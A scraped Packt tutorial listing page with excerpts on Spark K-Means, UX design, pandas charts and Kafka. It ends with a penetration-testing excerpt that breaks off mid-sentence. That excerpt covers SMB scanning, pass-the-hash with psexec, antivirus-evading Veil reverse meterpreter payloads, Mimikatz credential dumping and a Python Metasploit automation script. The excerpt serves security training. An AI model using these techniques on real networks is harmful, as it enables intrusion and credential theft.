How-To Tutorials

article-image-implementing-apache-spark-k-means-clustering-method-on-digital-breath-test-data-for-road-safety

01 Mar 2018

7 min read

Implementing Apache Spark K-Means Clustering method on digital breath test data for road safety

01 Mar 2018

[box type="note" align="" class="" width=""]This article is an excerpt taken from a book Mastering Apache Spark 2.x - Second Edition written by Romeo Kienzler. In this book, you will learn to use Spark as a big data operating system, understand how to implement advanced analytics on the new APIs, and explore how easy it is to use Spark in day-to-day tasks.[/box] In today’s tutorial, we have used the Road Safety test data from our previous article, to show how one can attempt to find clusters in data using K-Means algorithm with Apache Spark MLlib. Theory on Clustering The K-Means algorithm iteratively attempts to determine clusters within the test data by minimizing the distance between the mean value of cluster center vectors, and the new candidate cluster member vectors. The following equation assumes dataset members that range from X1 to Xn; it also assumes K cluster sets that range from S1 to Sk, where K <= n. K-Means in practice The K-Means MLlib functionality uses the LabeledPoint structure to process its data and so it needs numeric input data. As the same data from the last section is being reused, we will not explain the data conversion again. The only change that has been made in data terms in this section, is that processing in HDFS will now take place under the /data/spark/kmeans/ directory. Additionally, the conversion Scala script for the K-Means example produces a record that is all comma-separated. The development and processing for the K-Means example has taken place under the /home/hadoop/spark/kmeans directory to separate the work from other development. The sbt configuration file is now called kmeans.sbt and is identical to the last example, except for the project name: name := "K-Means" The code for this section can be found in the software package under chapter7K-Means. So, looking at the code for kmeans1.scala, which is stored under kmeans/src/main/scala, some similar actions occur. The import statements refer to the Spark context and configuration. This time, however, the K-Means functionality is being imported from MLlib. Additionally, the application class name has been changed for this example to kmeans1: import org.apache.spark.SparkContext import org.apache.spark.SparkContext._ import org.apache.spark.SparkConf import org.apache.spark.mllib.linalg.Vectors import org.apache.spark.mllib.clustering.{KMeans,KMeansModel} object kmeans1 extends App { The same actions are being taken as in the last example to define the data file--to define the Spark configuration and create a Spark context: val hdfsServer = "hdfs://localhost:8020" val hdfsPath = "/data/spark/kmeans/" val dataFile = hdfsServer + hdfsPath + "DigitalBreathTestData2013- MALE2a.csv" val sparkMaster = "spark://localhost:7077" val appName = "K-Means 1" val conf = new SparkConf() conf.setMaster(sparkMaster) conf.setAppName(appName) val sparkCxt = new SparkContext(conf) Next, the CSV data is loaded from the data file and split by comma characters into the VectorData variable: val csvData = sparkCxt.textFile(dataFile) val VectorData = csvData.map { csvLine => Vectors.dense( csvLine.split(',').map(_.toDouble)) } A KMeans object is initialized, and the parameters are set to define the number of clusters and the maximum number of iterations to determine them: val kMeans = new KMeans val numClusters = 3 val maxIterations = 50 Some default values are defined for the initialization mode, number of runs, and Epsilon, which we needed for the K-Means call but did not vary for the processing. Finally, these parameters were set against the KMeans object: val initializationMode = KMeans.K_MEANS_PARALLEL val numRuns = 1 val numEpsilon = 1e-4 kMeans.setK( numClusters ) kMeans.setMaxIterations( maxIterations ) kMeans.setInitializationMode( initializationMode ) kMeans.setRuns( numRuns ) kMeans.setEpsilon( numEpsilon ) We cached the training vector data to improve the performance and trained the KMeans object using the vector data to create a trained K-Means model: VectorData.cache val kMeansModel = kMeans.run( VectorData ) We have computed the K-Means cost and number of input data rows, and have output the results via println statements. The cost value indicates how tightly the clusters are packed and how separate the clusters are: val kMeansCost = kMeansModel.computeCost( VectorData ) println( "Input data rows : " + VectorData.count() ) println( "K-Means Cost : " + kMeansCost ) Next, we have used the K-Means Model to print the cluster centers as vectors for each of the three clusters that were computed: kMeansModel.clusterCenters.foreach{ println } Finally, we use the K-Means model predict function to create a list of cluster membership predictions. We then count these predictions by value to give a count of the data points in each cluster. This shows which clusters are bigger and whether there really are three clusters: val clusterRddInt = kMeansModel.predict( VectorData ) val clusterCount = clusterRddInt.countByValue clusterCount.toList.foreach{ println } } // end object kmeans1 So, in order to run this application, it must be compiled and packaged from the kmeans subdirectory as the Linux pwd command shows here: [hadoop@hc2nn kmeans]$ pwd /home/hadoop/spark/kmeans [hadoop@hc2nn kmeans]$ sbt package Loading /usr/share/sbt/bin/sbt-launch-lib.bash [info] Set current project to K-Means (in build file:/home/hadoop/spark/kmeans/) [info] Compiling 2 Scala sources to /home/hadoop/spark/kmeans/target/scala-2.10/classes... [info] Packaging /home/hadoop/spark/kmeans/target/scala-2.10/k- means_2.10-1.0.jar ... [info] Done packaging. [success] Total time: 20 s, completed Feb 19, 2015 5:02:07 PM Once this packaging is successful, we check HDFS to ensure that the test data is ready. As in the last example, we convert our data to numeric form using the convert.scala file, provided in the software package. We will process the DigitalBreathTestData2013- MALE2a.csv data file in the HDFS directory, /data/spark/kmeans, as follows: [hadoop@hc2nn nbayes]$ hdfs dfs -ls /data/spark/kmeans Found 3 items -rw-r--r-- 3 hadoop supergroup 24645166 2015-02-05 21:11 /data/spark/kmeans/DigitalBreathTestData2013-MALE2.csv -rw-r--r-- 3 hadoop supergroup 5694226 2015-02-05 21:48 /data/spark/kmeans/DigitalBreathTestData2013-MALE2a.csv drwxr-xr-x - hadoop supergroup 0 2015-02-05 21:46 /data/spark/kmeans/result The spark-submit tool is used to run the K-Means application. The only change in this command is that the class is now kmeans1: spark-submit --class kmeans1 --master spark://localhost:7077 --executor-memory 700M --total-executor-cores 100 /home/hadoop/spark/kmeans/target/scala-2.10/k-means_2.10-1.0.jar The output from the Spark cluster run is shown to be as follows: Input data rows : 467054 K-Means Cost : 5.40312223450789E7 The previous output shows the input data volume, which looks correct; it also shows the K- Means cost value. The cost is based on the Within Set Sum of Squared Errors (WSSSE) which basically gives a measure how well the found cluster centroids are matching the distribution of the data points. The better they are matching, the lower the cost. The following link https://datasciencelab.wordpress.com/2013/12/27/finding-the-k-in-k-means-clustering/ explains WSSSE and how to find a good value for k in more detail. Next come the three vectors, which describe the data cluster centers with the correct number of dimensions. Remember that these cluster centroid vectors will have the same number of columns as the original vector data: [0.24698249738061878,1.3015883142472253,0.005830116872250263,2.917374778855 5207,1.156645130895448,3.4400290524342454] [0.3321793984152627,1.784137241326256,0.007615970459266097,2.58319870759289 17,119.58366028156011,3.8379106085083468] [0.25247226760684494,1.702510963969387,0.006384899819416975,2.2314042480006 88,52.202897927594805,3.551509158139135] Finally, cluster membership is given for clusters 1 to 3 with cluster 1 (index 0) having the largest membership at 407539 member vectors: (0,407539) (1,12999) (2,46516) To summarize, we saw a practical example that shows how K-means algorithm is used to cluster data with the help of Apache Spark. If you found this post useful, do check out this book Mastering Apache Spark 2.x - Second Edition to learn about the latest enhancements in Apache Spark 2.x, such as interactive querying of live data and unifying DataFrames and Datasets.

0
1
16136

article-image-article-phone-calls-send-sms-your-website-using-twilio

Packt

21 Mar 2014

9 min read

Make phone calls and send SMS messages from your website using Twilio

Packt

21 Mar 2014

9 min read

0
0
16111

How-To Tutorials

article-image-why-motion-and-interaction-matter-in-a-ux-design-video

Sugandha Lahoti

16 Oct 2018

2 min read

Why Motion and Interaction matter in a UX design? [Video]

Sugandha Lahoti

16 Oct 2018

2 min read

Designing prototypes is a great way to extend your sketching skills and to test the products you’ve been building. In particular, user experience prototyping solves problems for users, infuses user needs into conversations, that eventually build better products and services. Motion and interaction are part of user experience prototyping. Motion helps in enforcing and exploring what the interaction design is like and prototyping interactions help us define how a product works. This clip is taken from the video Advanced UX Techniques by Chris R. Becker. In this course, you will explore UX techniques such as sketching, wireframes, and high-fidelity prototypes. https://www.youtube.com/watch?v=TTpxvuIBFwE Interaction Design (IxD) is the design of interactive products and services in which a designer’s focus is on including the way users will interact with it. In this video, we’ll explore the following five aspects of interaction design: Words: Do users understand, read and use the shape Objects: Do users recognize and use the shapes, if it’s a phone or a keyboard Time: The time is taken by users in accomplishing a task ( Are they reading a long article) Behavior: How do users respond or react to anything that app designers make them do. Visuals: Do users like what they see As you iterate on the prototypes of your app, you should be evaluating them against these aspects in your interaction design. The role of interaction design is trying to define the ways a user can interact. Interactions can be complex so strong focus should be given on thinking about how the systems are interconnected. Interactions are learned and can be improved through animations. Watch the clip above to learn more about why motion and interaction design are key aspects in a UX Design. About the Author Chris R. Becker is an Imaginative and creative Sr. UX designer/IxD/design thinker and educator. He designs across media platforms from the web to iOS and Android as well as SaaS and service design. He leads Design thinking workshops and UX deliverables, all the while using communication skills both in the classroom and for client presentations. What UX designers can teach Machine Learning Engineers? To start with: Model Interpretability. Trends UX Design. Grafana 5.3 is now stable, comes with Google Stackdriver built-in support, a new Postgres query builder

0
0
16106

How-To Tutorials

article-image-getting-started-with-data-storytelling

Aaron Lazar

28 Jan 2018

11 min read

Getting Started with Data Storytelling

Aaron Lazar

28 Jan 2018

11 min read

[box type="note" align="" class="" width=""]This article has been taken from the book Principles of Data Science, written by Sinan Ozdemir. It aims to practically introduce you to the different ways in which you can communicate or visualize your data to tell stories effectively.[/box] Communication matters Being able to conduct experiments and manipulate data in a coding language is not enough to conduct practical and applied data science. This is because data science is, generally, only as good as how it is used in practice. For instance, a medical data scientist might be able to predict the chance of a tourist contracting Malaria in developing countries with >98% accuracy, however, if these results are published in a poorly marketed journal and online mentions of the study are minimal, their groundbreaking results that could potentially prevent deaths would never see the true light of day. For this reason, communication of results through data storytelling is arguably as important as the results themselves. A famous example of poor management of distribution of results is the case of Gregor Mendel. Mendel is widely recognized as one of the founders of modern genetics. However, his results (including data and charts) were not well adopted until after his death. Mendel even sent them to Charles Darwin, who largely ignored Mendel's papers, which were written in unknown Moravian journals. Generally, there are two ways of presenting results: verbal and visual. Of course, both the verbal and visual forms of communication can be broken down into dozens of subcategories, including slide decks, charts, journal papers, and even university lectures. However, we can find common elements of data presentation that can make anyone in the field more aware and effective in their communication skills. Let's dive right into effective (and ineffective) forms of communication, starting with visuals. We’ll look at four basic types of graphs: scatter plots, line graphs, bar charts, histograms, and box plots. Scatter plots A scatter plot is probably one of the simplest graphs to create. It is made by creating two quantitative axes and using data points to represent observations. The main goal of a scatter plot is to highlight relationships between two variables and, if possible, reveal a correlation. For example, we can look at two variables: average hours of TV watched in a day and a 0-100 scale of work performance (0 being very poor performance and 100 being excellent performance). The goal here is to find a relationship (if it exists) between watching TV and average work performance. The following code simulates a survey of a few people, in which they revealed the amount of television they watched, on an average, in a day against a company-standard work performance metric: import pandas as pd hours_tv_watched = [0, 0, 0, 1, 1.3, 1.4, 2, 2.1, 2.6, 3.2, 4.1, 4.4, 4.4, 5] This line of code is creating 14 sample survey results of people answering the question of how many hours of TV they watch in a day. work_performance = [87, 89, 92, 90, 82, 80, 77, 80, 76, 85, 80, 75, 73, 72] This line of code is creating 14 new sample survey results of the same people being rated on their work performance on a scale from 0 to 100. For example, the first person watched 0 hours of TV a day and was rated 87/100 on their work, while the last person watched, on an average, 5 hours of TV a day and was rated 72/100: df = pd.DataFrame({'hours_tv_watched':hours_tv_watched, 'work_ performance':work_performance}) Here, we are creating a Dataframe in order to ease our exploratory data analysis and make it easier to make a scatter plot: df.plot(x='hours_tv_watched', y='work_performance', kind='scatter') Now, we are actually making our scatter plot. In the following plot, we can see that our axes represent the number of hours of TV watched in a day and the person's work performance metric: Each point on a scatter plot represents a single observation (in this case a person) and its location is a result of where the observation stands on each variable. This scatter plot does seem to show a relationship, which implies that as we watch more TV in the day, it seems to affect our work performance. Of course, as we are now experts in statistics from the last two chapters, we know that this might not be causational. A scatter plot may only work to reveal a correlation or an association between but not a causation. Advanced statistical tests, such as the ones we saw in Chapter 8, Advanced Statistics, might work to reveal causation. Later on in this chapter, we will see the damaging effects that trusting correlation might have. Line graphs Line graphs are, perhaps, one of the most widely used graphs in data communication. A line graph simply uses lines to connect data points and usually represents time on the x axis. Line graphs are a popular way to show changes in variables over time. The line graph, like the scatter plot, is used to plot quantitative variables. As a great example, many of us wonder about the possible links between what we see on TV and our behavior in the world. A friend of mine once took this thought to an extreme—he wondered if he could find a relationship between the TV show, The X-Files, and the amount of UFO sightings in the U.S.. He then found the number of sightings of UFOs per year and plotted them over time. He then added a quick graphic to ensure that readers would be able to identify the point in time when the X-files were released: It appears to be clear that right after 1993, the year of the X-Files premier, the number of UFO sightings started to climb drastically. This graphic, albeit light-hearted, is an excellent example of a simple line graph. We are told what each axis measures, we can quickly see a general trend in the data, and we can identify with the author's intent, which is to show a relationship between the number of UFO sightings and the X-files premier. On the other hand, the following is a less impressive line chart: This line graph attempts to highlight the change in the price of gas by plotting three points in time. At first glance, it is not much different than the previous graph—we have time on the bottom x axis and a quantitative value on the vertical y axis. The (not so) subtle difference here is that the three points are equally spaced out on the x axis; however, if we read their actual time indications, they are not equally spaced out in time. A year separates the first two points whereas a mere 7 days separates the last two points. Bar charts We generally turn to bar charts when trying to compare variables across different groups. For example, we can plot the number of countries per continent using a bar chart. Note how the x axis does not represent a quantitative variable, in fact, when using a bar chart, the x axis is generally a categorical variable, while the y axis is quantitative. Note that, for this code, I am using the World Health Organization's report on alcohol consumption around the world by country: drinks = pd.read_csv('data/drinks.csv') drinks.continent.value_counts().plot(kind='bar', title='Countries per Continent') plt.xlabel('Continent') plt.ylabel('Count') The following graph shows us a count of the number of countries in each continent. We can see the continent code at the bottom of the bars and the bar height represents the number of countries we have in each continent. For example, we see that Africa has the most countries represented in our survey, while South America has the least: In addition to the count of countries, we can also plot the average beer servings per continent using a bar chart, as shown: drinks.groupby('continent').beer_servings.mean().plot(kind='bar') Note how a scatter plot or a line graph would not be able to support this data because they can only handle quantitative variables; bar graphs have the ability to demonstrate categorical values. We can also use bar charts to graph variables that change over time, like a line graph. Histograms Histograms show the frequency distribution of a single quantitative variable by splitting up the data, by range, into equidistant bins and plotting the raw count of observations in each bin. A histogram is effectively a bar chart where the x axis is a bin (subrange) of values and the y axis is a count. As an example, I will import a store's daily number of unique customers, as shown: rossmann_sales = pd.read_csv('data/rossmann.csv') rossmann_sales.head() Note how we have multiple store data (by the first Store column). Let's subset this data for only the first store, as shown: first_rossmann_sales = rossmann_sales[rossmann_sales['Store']==1] Now, let's plot a histogram of the first store's customer count: first_rossmann_sales['Customers'].hist(bins=20) plt.xlabel('Customer Bins') plt.ylabel('Count') The x axis is now categorical in that each category is a selected range of values, for example, 600-620 customers would potentially be a category. The y axis, like a bar chart, is plotting the number of observations in each category. In this graph, for example, one might take away the fact that most of the time, the number of customers on any given day will fall between 500 and 700. Altogether, histograms are used to visualize the distribution of values that a quantitative variable can take on. Box plots Box plots are also used to show a distribution of values. They are created by plotting the five number summary, as follows: The minimum value The first quartile (the number that separates the 25% lowest values from the rest) The median The third quartile (the number that separates the 25% highest values from the rest) The maximum value In Pandas, when we create box plots, the red line denotes the median, the top of the box (or the right if it is horizontal) is the third quartile, and the bottom (left) part of the box is the first quartile. The following is a series of box plots showing the distribution of beer consumption according to continents: drinks.boxplot(column='beer_servings', by='continent') Now, we can clearly see the distribution of beer consumption across the seven continents and how they differ. Africa and Asia have a much lower median of beer consumption than Europe or North America. Box plots also have the added bonus of being able to show outliers much better than a histogram. This is because the minimum and maximum are parts of the box plot. Getting back to the customer data, let's look at the same store customer numbers, but using a box plot: first_rossmann_sales.boxplot(column='Customers', vert=False) This is the exact same data as plotted earlier in the histogram; however, now it is shown as a box plot. For the purpose of comparison, I will show you both the graphs one after the other: Note how the x axis for each graph are the same, ranging from 0 to 1,200. The box plot is much quicker at giving us a center of the data, the red line is the median, while the histogram works much better in showing us how spread out the data is and where people's biggest bins are. For example, the histogram reveals that there is a very large bin of zero people. This means that for a little over 150 days of data, there were zero customers. Note that we can get the exact numbers to construct a box plot using the describe feature in Pandas, as shown: first_rossmann_sales['Customers'].describe() min 0.000000 25% 463.000000 50% 529.000000 75% 598.750000 max 1130.000000 There we have it! We just learned data storytelling through various techniques like scatter plots, line graphs, bar charts, histograms and box plots. Now you’ve got the power to be creative in the way you tell tales of your data! If you found our article useful, you can check out Principles of Data Science for more interesting Data Science tips and techniques.

0
0
16096

Packt

10 Oct 2013

6 min read

Introducing Kafka

Packt

10 Oct 2013

6 min read

(For more resources related to this topic, see here.) In today's world, real-time information is continuously getting generated by applications (business, social, or any other type), and this information needs easy ways to be reliably and quickly routed to multiple types of receivers. Most of the time, applications that are producing information and applications that are consuming this information are well apart and inaccessible to each other. This, at times, leads to redevelopment of information of producers or consumers to provide an integration point between them. Therefore, a mechanism is required for seamless integration of information of producers and consumers to avoid any kind of rewriting of an application at either end. In the present era of big data, the first challenge is to collect the data and the second challenge is to analyze it. As it is a huge amount of data, the analysis typically includes the following and much more: User behavior data Application performance tracing Activity data in the form of logs Event messages Message publishing is a mechanism for connecting various applications with the help of messages that are routed between them, for example, by a message broker such as Kafka. Kafka is a solution to the real-time problems of any software solution, that is, to deal with real-time volumes of information and route it to multiple consumers quickly. Kafka provides seamless integration between information of producers and consumers without blocking the producers of the information, and without letting producers know who the final consumers are. Apache Kafka is an open source, distributed publish-subscribe messaging system, mainly designed with the following characteristics: Persistent messaging: To derive the real value from big data, any kind of information loss cannot be afforded. Apache Kafka is designed with O(1) disk structures that provide constant-time performance even with very large volumes of stored messages, which is in order of TB. High throughput: Keeping big data in mind, Kafka is designed to work on commodity hardware and to support millions of messages per second. Distributed: Apache Kafka explicitly supports messages partitioning over Kafka servers and distributing consumption over a cluster of consumer machines while maintaining per-partition ordering semantics. Multiple client support: Apache Kafka system supports easy integration of clients from different platforms such as Java, .NET, PHP, Ruby, and Python. Real time: Messages produced by the producer threads should be immediately visible to consumer threads; this feature is critical to event-based systems such as Complex Event Processing (CEP) systems. Kafka provides a real-time publish-subscribe solution, which overcomes the challenges of real-time data usage for consumption, for data volumes that may grow in order of magnitude, larger that the real data. Kafka also supports parallel data loading in the Hadoop systems. The following diagram shows a typical big data aggregation-and-analysis scenario supported by the Apache Kafka messaging system: At the production side, there are different kinds of producers, such as the following: Frontend web applications generating application logs Producer proxies generating web analytics logs Producer adapters generating transformation logs Producer services generating invocation trace logs At the consumption side, there are different kinds of consumers, such as the following: Offline consumers that are consuming messages and storing them in Hadoop or traditional data warehouse for offline analysis Near real-time consumers that are consuming messages and storing them in any NoSQL datastore such as HBase or Cassandra for near real-time analytics Real-time consumers that filter messages in the in-memory database and trigger alert events for related groups Need for Kafka A large amount of data is generated by companies having any form of web-based presence and activity. Data is one of the newer ingredients in these Internet-based systems. This data typically includes user-activity events corresponding to logins, page visits, clicks, social networking activities such as likes, sharing, and comments, and operational and system metrics. This data is typically handled by logging and traditional log aggregation solutions due to high throughput (millions of messages per second). These traditional solutions are the viable solutions for providing logging data to an offline analysis system such as Hadoop. However, the solutions are very limiting for building real-time processing systems. According to the new trends in Internet applications, activity data has become a part of production data and is used to run analytics at real time. These analytics can be: Search based on relevance Recommendations based on popularity, co-occurrence, or sentimental analysis Delivering advertisements to the masses Internet application security from spam or unauthorized data scraping Real-time usage of these multiple sets of data collected from production systems has become a challenge because of the volume of data collected and processed. Apache Kafka aims to unify offline and online processing by providing a mechanism for parallel load in Hadoop systems as well as the ability to partition real-time consumption over a cluster of machines. Kafka can be compared with Scribe or Flume as it is useful for processing activity stream data; but from the architecture perspective, it is closer to traditional messaging systems such as ActiveMQ or RabitMQ. Few Kafka usages Some of the companies that are using Apache Kafka in their respective use cases are as follows: LinkedIn (www.linkedin.com): Apache Kafka is used at LinkedIn for the streaming of activity data and operational metrics. This data powers various products such as LinkedIn news feed and LinkedIn Today in addition to offline analytics systems such as Hadoop. DataSift (www.datasift.com/): At DataSift, Kafka is used as a collector for monitoring events and as a tracker of users' consumption of data streams in real time. Twitter (www.twitter.com/): Twitter uses Kafka as a part of its Storm— a stream-processing infrastructure. Foursquare (www.foursquare.com/): Kafka powers online-to-online and online-to-offline messaging at Foursquare. It is used to integrate Foursquare monitoring and production systems with Foursquare, Hadoop-based offline infrastructures. Square (www.squareup.com/): Square uses Kafka as a bus to move all system events through Square's various datacenters. This includes metrics, logs, custom events, and so on. On the consumer side, it outputs into Splunk, Graphite, or Esper-like real-time alerting. The source of the above information is https: //cwiki. apache.org/confluence/display/KAFKA/Powered+By. Summary In this article, we have seen how companies are evolving the mechanism of collecting and processing application-generated data, and that of utilizing the real power of this data by running analytics over it. Resources for Article: Further resources on this subject: Apache Felix Gogo [Article] Hadoop and HDInsight in a Heartbeat [Article] Advanced Hadoop MapReduce Administration [Article]

0
0
16074

article-image-exploiting-services-python

Packt

24 Sep 2015

15 min read

Exploiting Services with Python

Packt

24 Sep 2015

15 min read

In this article by Christopher Duffy author of the book Learning Python Penetration Testing, we will learn about one of the big misconceptions with testing for the synchronization of account credentials today, is the prevalence of exploitable. You will still find vulnerabilities that can be exploited by overflowing the stack or heap, they are just significantly reduced or more complex. (For more resources related to this topic, see here.) Testing for the synchronization of account credentials With these results, we can determine if any of these credentials are reused in the network. We know there are Windows hosts primarily in the target network, but we need to identify which ones have port 445 open. We can then try and determine, which accounts might grant us access, when the following command is run: nmap -sS -vvv -p445 192.168.195.0/24 -oG output Then, parse the results for open ports with the following command, which will provide a file of target hosts with Server Message Block (SMB) enabled. grep 445/open output| cut -d" " -f2 >> smb_hosts The passwords can be extracted directly from John and written a password file that can be used for follow-on service attacks. john --show unshadowed |cut -d: -f2|grep -v " " > passwords Always test on a single host the first time you run this type of attack. In this example, we are using the sys account, but it is more common to use the root account or similar administrative accounts to test password reuse (synchronization) in an environment. The following attack using auxiliary/scanner/smb/smb_enumusers_domain will check for two things. It will identify what systems this account has access to, and the relevant users that are currently logged into the system. In the second portion of this example, we will highlight how to identify the accounts that are actually privileged and part of the Domain. There are good points and bad points about the smb_enumusers_domain module. The bad points are that you cannot load multiple usernames and passwords into it. That capability is reserved for the smb_login module. The problem with smb_login is that it is extremely noisy, as many signature detection tools flag on this method of testing for logins. The third module smb_enumusers, which can be used, but it only provides details related to locale users as it identifies users based on the Security Accounts Manager (SAM) file contents. So, if a user has a Domain account and has logged into the box, the smb_enumusers module will not identify them. So, understand each module and its limitations when identifying targets to laterally move. We are going to highlight how to configure the smb_enumusers_domain module and execute it. This will show an example of gaining access to a vulnerable host and then verifying DA account membership. This information can then be used to identify where a DA is located so that Mimikatz can be used to extract credentials. For this example, we are going to use a custom exploit using Veil as well, to attempt to bypass a resident Host Intrusion Prevention System (HIPS). More information about Veil can be found here at https://github.com/Veil-Framework/Veil-Evasion.git. So, we configure the module to use the password batman, and we target the local administrator account on the system. This can be changed, but often the default is used. Since it is the local administrator, the Domain is set to WORKGROUP. The following figure shows the configuration of the module: Before running commands such as these, make sure to use spool, to output the results to a log file so you can go back and review the results. As you can see in the following figure, the account provided details about who was logged into the system. This means that there are logged in users relevant to the returned account names and that the local administrator account will work on that system. This means this system is ripe for compromise by a Pass-the-Hash attack (PtH). The psexec module allows you to either pass the extracted Local Area Network Manager (LM): New Technology LM (NTLM) hash and username combination or just the username password pair to get access. To begin with, we setup a custom multi/handler to catch the custom exploit we generated by Veil as shownfollowing. Keep in mind, I used 443 for the local port because it bypasses most HIPS and the local host will change depending on your host. Now, we need to generate custom payloads with Veil to be used with the psexec module. You can do this by navigating to the Veil-Evasion installation directory and running it with python Veil-Evasion.py. Veil has a good number of payloads that can be generated with a variety of obfuscation or protection mechanisms, to see the specific payload you want to use, to execute the list command. You can select the payload by typing in the number of the payload or the name. As an example, run the following commands to generate a C Sharp stager that does not use shell code, keep in mind this requires specific versions of .NET on the target box to work. use cs/meterpreter/rev_tcp set LPORT 443 set LHOST 192.168.195.160 set use_arya Y generate There are two components to a typical payload, the stager and the stage. A stager sets up the network connection between the attacker and the victim. Payloads that often use native system languages can be purely stager. The second part is the stage, which are the components that are downloaded by the stager. These can include things like your Meterpreter. If both items are combined, they are called a single; think about when you create your malicious Universal Serial Bus (USB) drives, these are often singles. The output will be an executable, that will spawn an encrypted reverse HyperText Transfer Protocol Secure (HTTPS) Meterpreter. The payload can be tested with the script checkvt, which safely verifies if the payload would be picked up by most HIPS solutions. It does this without uploading it to Virus Total, and in turn does not add the payload to the database, which many HIPS providers pull from. Instead, it compares the hash of the payload to those already in the database. Now, we can setup the psexec module to reference the custom payload for execution. Update the psexec module, so that it uses the custom payload generated by Veil-Evasion, via set EXE::Custom and disable the automatic payload handler with set DisablePayloadHandler true, as shown following: Exploit the target box, and then attempt to identify who the DAs are in the Domain. This can be done in one of two ways, either by using the post/windows/gather/enum_domain_group_users module or the following command from shell access. net group "Domain Admins" We can then Grep through the spooled output file from the previously run module to locate relevant systems that might have these Das logged into. When gaining access to one of those systems, there would likely be DA tokens or credentials in memory, which can be extracted and reused. The following command is an example of how to analyze the log file for these types of entries. grep <username> <spoofile.log> As you can see, this very simple exploit path allows you to identify where the DAs are. Once you are on the system all you have to do is load mimikatz and extract the credentials typically with the wdigest command from the established Meterpreter session. Of course, this means the system has to be newer than Windows 2000, and have active credentials in memory. If not, it will take additional effort and research to move forward. To highlight this, we use our established session to extract credentials with Mimikatz as you can see following. The credentials are in memory and since the target box was Windows XP machine, we have no conflicts and no additional research is required. In addition to the intelligence we have gathered from extracting the active DA list from the system, we now have another set of confirmed credentials that can be used. Rinsing and repeating this method of attack allows you to quickly move laterally around the network till you identify viable targets. Automating the exploit train with Python This exploit train is relatively simple, but we can automate a portion of this with the Metasploit Remote Procedure Call (MSFRPC). This script will use the nmap library to scan for active ports of 445, then generate a list of targets to test using a username and password passed via argument to the script. The script will use the same smb_enumusers_domain module to identify boxes that have the credentials reused and other viable users logged into them. First, we need to install SpiderLabs msfrpc library for Python. This library can be found here at https://github.com/SpiderLabs/msfrpc.git. The script we are creating uses the netifaces library to identify what interface IP addresses belong to your host. It then scans for port 445 the SMB port on the IP address, range, or the Classes Inter Domain Routing (CIDR) address. It eliminates any IP addresses that belong to your interface and then tests the credentials using the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain. At the same time, it verifies what users are logged onto the system. The outputs of this script in addition to real time response are two files, a log file that contains all the responses, and a file that holds the IP addresses for all the hosts that have SMB services. This Metasploit module takes advantage of RPCDCE, which does not run on port 445, but we are verifying that the service is available for follow-on exploitation. This file could then be fed back into the script, if you as an attacker find other credential sets to test as shown following: Lastly, the script can be passed hashes directly just like the Metasploit module as shown following: The output will be slightly different for each running of the script, depending on the console identifier you grab to execute the command. The only real difference will be the additional banner items typical with a Metasploit console initiation. Now there are a couple things that have to be stated, yes you could just generate a resource file, but when you start getting into organizations that have millions of IP addresses, this becomes unmanageable. Also the MSFRPC can have resource files fed directly into it as well, but it can significantly slow the process. If you want to compare, rewrite this script to do the same test as the previous ssh_login.py script you wrote, but with direct MSFRPC integration. Like all scripts libraries are needed to be established, most of these you are already familiar with, the newest one relates to the MSFRPC by SpiderLabs. The required libraries for this script can be seen as follows: import os, argparse, sys, time try: import msfrpc except: sys.exit("[!] Install the msfrpc library that can be found here: https://github.com/SpiderLabs/msfrpc.git") try: import nmap except: sys.exit("[!] Install the nmap library: pip install python- nmap") try: import netifaces except: sys.exit("[!] Install the netifaces library: pip install netifaces") We then build a module, to identify relevant targets that are going to have the auxiliary module run against it. First, we setup the constructors and the passed parameters. Notice that we have two service names to test against for this script, microsoft-ds and netbios-ssn, as either one could represent port 445 based on the nmap results. def target_identifier(verbose, dir, user, passwd, ips, port_num, ifaces, ipfile): hostlist = [] pre_pend = "smb" service_name = "microsoft-ds" service_name2 = "netbios-ssn" protocol = "tcp" port_state = "open" bufsize = 0 hosts_output = "%s/%s_hosts" % (dir, pre_pend) After which, we configure the nmap scanner to scan for details either by file or by command line. Notice that the hostlist is a string of all the addresses loaded by the file, and they are separated by spaces. The ipfile is opened and read and then all newlines are replaced with spaces as they are loaded into the string. This is a requirement for the specific hosts argument of the nmap library. if ipfile != None: if verbose > 0: print("[*] Scanning for hosts from file %s") % (ipfile) with open(ipfile) as f: hostlist = f.read().replace('n',' ') scanner.scan(hosts=hostlist, ports=port_num) else: if verbose > 0: print("[*] Scanning for host(s) %s") % (ips) scanner.scan(ips, port_num) open(hosts_output, 'w').close() hostlist=[] if scanner.all_hosts(): e = open(hosts_output, 'a', bufsize) else: sys.exit("[!] No viable targets were found!") The IP addresses for all of the interfaces on the attack system are removed from the test pool. for host in scanner.all_hosts(): for k,v in ifaces.iteritems(): if v['addr'] == host: print("[-] Removing %s from target list since it belongs to your interface!") % (host) host = None Finally, the details are then written to the relevant output file and python lists, and then returned to the original call origin. if host != None: e = open(hosts_output, 'a', bufsize) if service_name or service_name2 in scanner[host][protocol][int(port_num)]['name']: if port_state in scanner[host][protocol][int(port_num)]['state']: if verbose > 0: print("[+] Adding host %s to %s since the service is active on %s") % (host, hosts_output, port_num) hostdata=host + "n" e.write(hostdata) hostlist.append(host) else: if verbose > 0: print("[-] Host %s is not being added to %s since the service is not active on %s") % (host, hosts_output, port_num) if not scanner.all_hosts(): e.closed if hosts_output: return hosts_output, hostlist The next function creates the actual command that will be executed; this function will be called for each host the scan returned back as a potential target. def build_command(verbose, user, passwd, dom, port, ip): module = "auxiliary/scanner/smb/smb_enumusers_domain" command = '''use ''' + module + ''' set RHOSTS ''' + ip + ''' set SMBUser ''' + user + ''' set SMBPass ''' + passwd + ''' set SMBDomain ''' + dom +''' run ''' return command, module The last function actually initiates the connection with the MSFRPC and executes the relevant command per specific host. def run_commands(verbose, iplist, user, passwd, dom, port, file): bufsize = 0 e = open(file, 'a', bufsize) done = False The script creates a connection with the MSFRPC and creates console then tracks it by a specific console_id. Do not forget, the msfconsole can have multiple sessions, and as such we have to track our session to a console_id. client = msfrpc.Msfrpc({}) client.login('msf','msfrpcpassword') try: result = client.call('console.create') except: sys.exit("[!] Creation of console failed!") console_id = result['id'] console_id_int = int(console_id) The script then iterates over the list of IP addresses that were confirmed to have an active SMB service. The script then creates the necessary commands for each of those IP addresses. for ip in iplist: if verbose > 0: print("[*] Building custom command for: %s") % (str(ip)) command, module = build_command(verbose, user, passwd, dom, port, ip) if verbose > 0: print("[*] Executing Metasploit module %s on host: %s") % (module, str(ip)) The command is then written to the console and we wait for the results. client.call('console.write',[console_id, command]) time.sleep(1) while done != True: We await the results for each command execution and verify the data that has been returned and that the console is not still running. If it is, we delay the reading of the data. Once it has 